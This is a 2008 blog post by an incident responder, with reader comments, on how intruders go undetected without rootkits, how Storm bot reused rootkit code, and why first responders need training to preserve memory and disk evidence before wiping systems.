Sunday, August 24, 2008

The Demented Musings of an Incident Responder

I respond, therefore I am. H. Carvey, 2008

I thought I'd jot down some of the things I see from time to time in the field...

In some network infrastructures, there's no need to use rootkits or other obfuscation methods.

In fact, these attempts to hide an intruder's activity may actually get the intruder noticed...incorrectly programmed or implemented rootkits lead to BSODs, which get you noticed. Look at some of the SQL injection attacks...not the ones you saw in the news, but the ones you didn't see...well, okay...if you didn't see them, then you can't look at them. I get it. Anyway, the other SQL injection attacks would punch completely through into the interior network infrastructure, and the intruder would be on systems with privileges above Administrator. From there, they'd punch out of the infrastructure to get their tools...via TFTP, FTP (the ftp.exe client on Windows systems is CLI and allows you to use scripts of commands), their own wget.exe, etc. From there, the intruder would use their tools to extend their reach...create user accounts, etc...and many times go unnoticed.

However...while we are on the subject of rootkits...I was reading a post over on the Volatility Tumblr blog, and came across this interesting bit of analysis of the Storm bot from TippingPoint's Digital Vaccine Labs (DVL). Apparently, the rootkit capabilities of this malware were "copied" (their word, not mine) from existing code. The point of this is that some issues with rootkits are being solved by using existing, proven code. Symantec has a post on the Storm bot, showing that it doesn't just blow up on a system.

Many times, an organization's initial response exposes them to greater risk than the incident itself, simply by making it impossible to answer the necessary questions.

Perhaps more so than anything else, state notification laws (CA SB-1386, AB-1298, etc.) and compliance standards set forth by regulatory bodies ('nuff said!) are changing the face of incident response. What I mean by that is that rather than just cleaning systems (running AV, deleting files and accounts, or simply wiping and reinstalling the system) is no longer an option, because now we need to know if (a) there was "sensitive data" on the system, and then (b) if the malware or compromise led to the exposure of that data.

What this leads us to is that the folks closest to the systems...helpdesk, IT admins, etc...need to be trained in proper response techniques and activities. They need to have the knowledge and the tools in place in order to react quickly...like an EMT. For example, rather than pulling a system offline and wiping it, obtain a physical memory dump, disconnect the system from the network, obtain an image, and then wipe the system. Properly control, preserve, and maintain custody of the data so that forensic analysts can do their thing. This process is somewhat over-simplified, I know, but it's something that can be used as a basis for getting those important questions answered. Add to that network traffic captures and any available device logs, and you've pretty much got most of what incident responders such as myself are looking for when we are asked to respond.

3 comments:

Neil Carpenter said...

"In some network infrastructures, there's no need to use rootkits or other obfuscation methods."

This is true more often than not. Customers don't take it well when they hear that their network has been compromised for months (years) and they never noticed.

Anonymous said...

as long as custumors dont know and dont notice u can do what ever u want... /lagerhall

hogfly said...

Harlan,

Couldn't agree more. Training is vital, however it's not just training that people need, it's regular and repetitive training, much like military methods. Drilling actions in to the 'first responders' so they do what they're told when things start to happen.

Regarding obfuscation and hiding tracks I think we saw a lot of this really take off a few years back when attackers just splattered systems and didn't bother to hide. They didn't need to and realized that attempting to hide in a smaller amount of targets that may be of higher intrinsic value is less effective than widespread infections in less valuable targets, gaining value in quantity, rather than quality. This still holds true today. Of course there are those out there who get the big scores.

Computers are no longer a luxury, they are a requirement and people just want them to work, they no longer care how they work, so they stopped looking under the hood. Curiosity is not cost effective. These attacks go unnoticed for this reason. Like our cars, people assume everything is ok if they can get from point A to B. We take it to the mechanic when we notice something is wrong, but had we looked under the hood, we may have noticed that the belts were worn to the point of snapping and the battery terminals were corroded. Unless people see something that's blatantly out of the ordinary, everything must be fine and the systems are safe as long as they are operational.